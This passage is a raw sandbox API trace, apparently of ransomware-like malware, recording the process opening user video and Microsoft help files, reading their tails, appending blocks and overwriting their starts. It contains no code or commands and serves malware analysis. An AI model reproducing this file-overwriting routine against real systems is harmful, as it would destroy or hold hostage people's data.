lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.298] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.298] WriteFile (in: hFile=0x204, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.298] CloseHandle (hObject=0x204) returned 1 [0162.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\qMVQNoC1q_-gzbRhHXT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\qmvqnoc1q_-gzbrhhxt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.299] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.300] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e90 [0162.300] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.300] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.301] ReleaseMutex (hMutex=0x168) returned 1 [0162.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qMVQNoC1q_-gzbRhHXT.swf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0162.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qMVQNoC1q_-gzbRhHXT.swf", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qMVQNoC1q_-gzbRhHXT.swf", lpUsedDefaultChar=0x0) returned 23 [0162.301] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.302] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e90 [0162.302] ReadFile (in: hFile=0x204, lpBuffer=0x286da88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.302] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e90 [0162.303] WriteFile (in: hFile=0x204, lpBuffer=0x3cfeaf8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfeaf8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.303] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.304] WriteFile (in: hFile=0x204, lpBuffer=0x3cfeaf8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfeaf8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0162.304] CloseHandle (hObject=0x204) returned 1 [0162.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\JIhkkdJXq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\jihkkdjxq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x136f3 [0162.305] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.306] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.306] ReleaseMutex (hMutex=0x168) returned 1 [0162.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JIhkkdJXq.mp4", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JIhkkdJXq.mp4", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JIhkkdJXq.mp4", lpUsedDefaultChar=0x0) returned 13 [0162.306] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.307] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x126f3 [0162.308] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.308] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x126f3 [0162.308] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.308] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.308] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.309] CloseHandle (hObject=0x204) returned 1 [0162.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\vuifTep-4o6j41\\Z7jmLdn1i.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\vuiftep-4o6j41\\z7jmldn1i.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.310] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.310] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa6bd [0162.310] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.311] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.311] ReleaseMutex (hMutex=0x168) returned 1 [0162.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Z7jmLdn1i.flv", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Z7jmLdn1i.flv", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z7jmLdn1i.flv", lpUsedDefaultChar=0x0) returned 13 [0162.311] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.312] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96bd [0162.313] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.313] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x96bd [0162.313] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.314] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.314] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.314] CloseHandle (hObject=0x204) returned 1 [0162.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tZQdl72iAzG4_Ja.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tzqdl72iazg4_ja.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0162.315] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.316] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe1ce [0162.316] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0162.316] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.316] ReleaseMutex (hMutex=0x168) returned 1 [0162.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tZQdl72iAzG4_Ja.mp4", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0162.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tZQdl72iAzG4_Ja.mp4", cchWideChar=19, lpMultiByteStr=0x1f88d34, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tZQdl72iAzG4_Ja.mp4", lpUsedDefaultChar=0x0) returned 19 [0162.317] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0162.318] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xd1ce [0162.318] ReadFile (in: hFile=0x204, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.318] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xd1ce [0162.319] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0162.319] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0162.319] WriteFile (in: hFile=0x204, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0162.319] CloseHandle (hObject=0x204) returned 1 [0162.320] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0163.018] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0163.018] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x325ec [0163.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0163.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0163.019] ReleaseMutex (hMutex=0x168) returned 1 [0163.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MKWD_BestBet.H1W", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0163.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MKWD_BestBet.H1W", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help_MKWD_BestBet.H1W", lpUsedDefaultChar=0x0) returned 21 [0163.019] ReadFile (in: hFile=0x204, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0163.021] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x315ec [0163.021] ReadFile (in: hFile=0x204, lpBuffer=0x25ac1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0163.022] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x315ec [0163.022] WriteFile (in: hFile=0x204, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0163.333] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0163.333] WriteFile (in: hFile=0x204, lpBuffer=0x3d0e028*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0163.334] CloseHandle (hObject=0x204) returned 1 [0164.072] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0164.608] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x2b1f690*="background.png") returned 0x66 [0164.608] GetLastError () returned 0x5 [0164.608] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0164.608] LocalFree (hMem=0x69e2b0) returned 0x0 [0164.608] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0164.608] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0164.609] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0164.609] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0164.609] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0164.610] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0164.610] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat", lpFilePart=0x2b1f690*="RacMetaData.dat") returned 0x3a [0164.610] GetLastError () returned 0x20 [0164.610] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="hʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0164.610] LocalFree (hMem=0x68e418) returned 0x0 [0164.610] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0164.610] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0164.610] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0164.611] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0164.611] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat")) returned 0x2020 [0164.611] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.611] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.611] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e0 [0164.611] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.611] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.612] ReleaseMutex (hMutex=0x168) returned 1 [0164.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0164.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0164.612] ReadFile (in: hFile=0x130, lpBuffer=0x3cfef38, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x3cfef38*, lpNumberOfBytesRead=0x2b1f2bc*=0x6e0, lpOverlapped=0x0) returned 1 [0164.612] CloseHandle (hObject=0x130) returned 1 [0164.612] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.612] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.612] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6da [0164.612] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0164.612] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.612] ReleaseMutex (hMutex=0x168) returned 1 [0164.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0164.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0164.613] ReadFile (in: hFile=0x130, lpBuffer=0x3cfef38, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x3cfef38*, lpNumberOfBytesRead=0x2b1f2bc*=0x6da, lpOverlapped=0x0) returned 1 [0164.613] CloseHandle (hObject=0x130) returned 1 [0164.613] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, 